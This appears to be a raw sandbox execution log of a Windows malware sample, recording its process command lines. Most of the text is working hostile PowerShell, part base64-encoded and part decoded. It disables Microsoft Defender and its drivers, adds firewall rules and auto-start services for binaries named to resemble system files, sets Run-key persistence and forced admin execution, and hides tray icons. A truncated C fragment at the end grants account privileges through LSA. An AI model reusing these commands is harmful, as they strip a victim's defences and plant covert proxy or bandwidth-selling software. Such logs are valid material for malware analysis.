BsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABDAG8AbQBtAGEAbgBkAEwAaQBuAGUACgAgACAAIAAgACAAIAAgACAAZQB4AGkAdAAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoACgB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAdAByAHUAZQAKAH0ACgAKADYANwAuAC4AOQAwAHwAZgBvAHIAZQBhAGMAaAAtAG8AYgBqAGUAYwB0AHsACgAgACAAIAAgACQAZAByAGkAdgBlACAAPQAgAFsAYwBoAGEAcgBdACQAXwAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAgACAAIAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAiACQAKAAkAGQAcgBpAHYAZQApADoAXAAqACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgB9AAoACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoACgAkAHMAdgBjAF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQATgBpAHMAUwB2AGMAIgAsACAAIgBXAGkAbgBEAGUAZgBlAG4AZAAiACwAIAAiAFMAZQBuAHMAZQAiACkACgBmAG8AcgBlAGEAYwBoACgAJABzAHYAYwAgAGkAbgAgACQAcwB2AGMAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABzAHYAYwAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAHMAdgBjACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAcwB2AGMAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAdAByAHUAZQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgB9AAoACgAkAGQAcgB2AF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQAbgBpAHMARAByAHYAIgAsACAAIgB3AGQAZgBpAGwAdABlAHIAIgAsACAAIgB3AGQAYgBvAG8AdAAiACkACgBmAG8AcgBlAGEAYwBoACgAJABkAHIAdgAgAGkAbgAgACQAZAByAHYAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABkAHIAdgAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAGQAcgB2ACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAZAByAHYAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAdAByAHUAZQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgB9AAoACgBpAGYAKAAkACgARwBFAFQALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAVwBpAG4ARABlAGYAZQBuAGQAKQAuAFMAdABhAHQAdQBzACAALQBlAHEAIAAiAFIAdQBuAG4AaQBuAGcAIgApACAAewAgACAAIAAKACAAIAAgACAAJABuAGUAZQBkAF8AcgBlAGIAbwBvAHQAIAA9ACAAJAB0AHIAdQBlAAoAfQAKAA==

C:\Windows\system32\whoami.exe

"C:\Windows\system32\whoami.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe

"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe"

C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe

"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1BA4.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi1B92.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1B93.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1B94.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc N e w - N e t F i r e w a l l R u l e   - N a m e   " M i c r o s o f t   E d g e "   - D i s p l a y N a m e   " M i c r o s o f t   E d g e "   - G r o u p   " M i c r o s o f t   E d g e "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d I l h o s t . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S e a r c h "   - D i s p l a y N a m e   " W i n d o w s   S e a r c h "   - G r o u p   " W i n d o w s   S e a r c h "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d l I h o s t . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " C h r o m e   U p d a t e "   - D i s p l a y N a m e   " C h r o m e   U p d a t e "   - G r o u p   " C h r o m e   U p d a t e "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ R u n t i m e B r o o k e r . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   T u n i n g "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   T u n i n g "   - G r o u p   " W i n d o w s   M e d i a   T u n i n g "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ B r a v e C r a s h H a n d l e r . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ t r a f f m o n e t i z e r \ a p p \ T e x t l n p u t H o s t . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - D i s p l a y N a m e   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - G r o u p   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ U s e r 0 0 B E B r o k e r . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P   S t r e a m i n g   ( T C P ) "   - D i s p l a y N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - G r o u p   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ I s a s s . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " B r a v e   B r o w s e r "   - D i s p l a y N a m e   " B r a v e   B r o w s e r "   - G r o u p   " B r a v e   B r o w s e r "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d I l h o s t . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   P l a y e r "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   P l a y e r "   - G r o u p   " W i n d o w s   M e d i a   P l a y e r "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d l I h o s t . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - G r o u p   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ R u n t i m e B r o o k e r . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - G r o u p   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ B r a v e C r a s h H a n d l e r . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   C o n t r o l "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   C o n t r o l "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r   C o n t r o l "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ t r a f f m o n e t i z e r \ a p p \ T e x t l n p u t H o s t . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S u b - n e t w o r k   C o n t r o l "   - D i s p l a y N a m e   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - G r o u p   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ U s e r 0 0 B E B r o k e r . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - D i s p l a y N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - G r o u p   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ I s a s s . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - S e r v i c e   - N a m e   " D e v A s s o c M a n "   - D i s p l a y N a m e   " D e v i c e   A s s o c i a t i o n   M a n a g e r "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   D e v i c e   A s s o c i a t i o n   M a n a g e r   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e 
 N e w - S e r v i c e   - N a m e   " N g c C p m r S v c "   - D i s p l a y N a m e   " M i c r o s o f t   C r e d e n t i a l s   P a s s p o r t "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   M i c r o s o f t   C r e d e n t i a l s   P a s s p o r t   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e 
 N e w - S e r v i c e   - N a m e   " T i m e R a t i o S v c "   - D i s p l a y N a m e   " T i m e   R a t i o   S e r v i c e "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   T i m e   R a t i o   S e r v i c e   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e 
 N e w - S e r v i c e   - N a m e   " P r o g r a m s C a c h e "   - D i s p l a y N a m e   " C a c h e   P r o g r a m   C o n t r o l "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   C a c h e   P r o g r a m   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r . e x e 
 N e w - S e r v i c e   - N a m e   " N o P e e r D i s t S v c "   - D i s p l a y N a m e   " S u b B r a n c h C a c h e "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   S u b B r a n c h C a c h e   P r o g r a m   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r A r m 6 4 . e x e 
 N e w - S e r v i c e   - N a m e   " S p o o l e r C o n t r o l "   - D i s p l a y N a m e   " S p o o l e r   A d v a n c e   C o n t r o l "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   S p o o l e r   P r o g r a m   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e 
 N e w - S e r v i c e   - N a m e   " T e l e m e t r y M g m t "   - D i s p l a y N a m e   " T e l e m e t r y   M a n a g e r "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   T e l e m e t r y   M a n a g e r   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ "   - N a m e   " G r a p h i c s D r i v e r s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   H w S c h M o d e   - V a l u e   2   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d "   - T y p e   D W o r d   - V a l u e   2   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n \ "   - N a m e   A l l o w T e l e m e t r y   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   A l l o w C o r t a n a   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   B r a v e C r a s h H a n d l e r   - V a l u e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r . e x e   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ E x p l o r e r "   - N a m e   N o T r a y I t e m s D i s p l a y   - V a l u e   1   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ E x p l o r e r "   - N a m e   " N o T r a y I t e m s D i s p l a y "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   $ e n v : T E M P \ U s e r 0 0 B E B r o k e r . e x e   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   $ e n v : T E M P \ U s e r 0 0 B E B r o k e r . e x e   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss448E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi448B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr448C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr448D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc # d e f i n e   U N I C O D E 
 # d e f i n e   _ U N I C O D E 
 
 # i n c l u d e   < w i n d o w s . h > 
 # i n c l u d e   < n t s e c a p i . h > 
 # i n c l u d e   < n t s t a t u s . h > 
 # i n c l u d e   < S d d l . h > 
 
 v o i d   I n i t L s a S t r i n g ( P L S A _ U N I C O D E _ S T R I N G   L s a S t r i n g ,   L P W S T R   S t r i n g ) 
 { 
         D W O R D   S t r i n g L e n g t h ; 
 
         i f   ( S t r i n g   = =   N U L L )   { 
                 L s a S t r i n g - > B u f f e r   =   N U L L ; 
                 L s a S t r i n g - > L e n g t h   =   0 ; 
                 L s a S t r i n g - > M a x i m u m L e n g t h   =   0 ; 
                 r e t u r n ; 
         } 
 
         S t r i n g L e n g t h   =   w c s l e n ( S t r i n g ) ; 
         L s a S t r i n g - > B u f f e r   =   S t r i n g ; 
         L s a S t r i n g - > L e n g t h   =   ( U S H O R T ) S t r i n g L e n g t h   *   s i z e o f ( W C H A R ) ; 
         L s a S t r i n g - > M a x i m u m L e n g t h   =   ( U S H O R T ) ( S t r i n g L e n g t h   +   1 )   *   s i z e o f ( W C H A R ) ; 
 } 
 
 N T S T A T U S   O p e n P o l i c y ( L P W S T R   S e r v e r N a m e ,   D W O R D   D e s i r e d A c c e s s ,   P L S A _ H A N D L E   P o l i c y H a n d l e ) 
 { 
         L S A _ O B J E C T _ A T T R I B U T E S   O b j e c t A t t r i b u t e s ; 
         L S A _ U N I C O D E _ S T R I N G   S e r v e r S t r i n g ; 
         P L S A _ U N I C O D E _ S T R I N G   S e r v e r   =   N U L L ; 
 
         / /   
         / /   A l w a y s   i n i t i a l i z e   t h e   o b j e c t   a t t r i b u t e s   t o   a l l   z e r o e s . 
         / /   
         Z e r o M e m o r y ( & O b j e c t A t t r i b u t e s ,   s i z e o f ( O b j e c t A t t r i b u t e s ) ) ; 
 
         i f   ( S e r v e r N a m e   ! =   N U L L )   { 
                 / /   
                 / /   M a k e   a   L S A _ U N I C O D E _ S T R I N G   o u t   o f   t h e   L P W S T R   p a s s e d   i n 
                 / /   
                 I n i t L s a S t r i n g ( & S e r v e r S t r i n g ,   S e r v e r N a m e ) ; 
                 S e r v e r   =   & S e r v e r S t r i n g ; 
         } 
 
         / /   
         / /   A t t e m p t   t o   o p e n   t h e   p o l i c y . 
         / /   
         r e t u r n   L s a O p e n P o l i c y ( 
                 S e r v e r , 
                 & O b j e c t A t t r i b u t e s , 
                 D e s i r e d A c c e s s , 
                 P o l i c y H a n d l e 
         ) ; 
 } 
 
 N T S T A T U S   S e t P r i v i l e g e O n A c c o u n t ( L S A _ H A N D L E   P o l i c y H a n d l e ,   P S I D   A c c o u n t S i d ,   L P W S T R   P r i v i l e g e N a m e ,   B O O L   b E n a b l e ) 
 { 
         L S A _ U N I C O D E _ S T R I N G   P r i v i l e g e S t r i n g ; 
 
         / /   
         / /   C r e a t e   a   L S A _ U N I C O D E _ S T R I N G   f o r   t h e   p r i v i l e g e   n a m e . 
         / /   
         I n i t L s a S t r i n g ( & P r i v i l e g e S t r i n g ,   P r i v i l e g e N a m e ) ; 
 
         / /   
         / /   g r a n t   o r   r e v o k e   t h e   p r i v i l e g e ,   a c c o r d i n g l y 
         / /   
         i f   ( b E n a b l e )   { 
                 r e t u r n   L s a A d d A c c o u n t R i g h t s ( 
                         P o l i c y H a n d l e ,               / /   o p e n   p o l i c y   h a n d l e 
                         A c c o u n t S i d ,                   / /   t a r g e t   S I D 
                         & P r i v i l e g e S t r i n g ,       / /   p r i v i l e g e s 
                         1                                       / /   p r i v i l e g e   c o u n t 
                 ) ; 
         } 
         e l s e   { 
                 r e t u r n   L s a R e m o v e A c c o u n t R i g h t s ( 
                         P o l i c y H a n d l e ,               / /   o p e n   p o l i c y   h a n d l e 
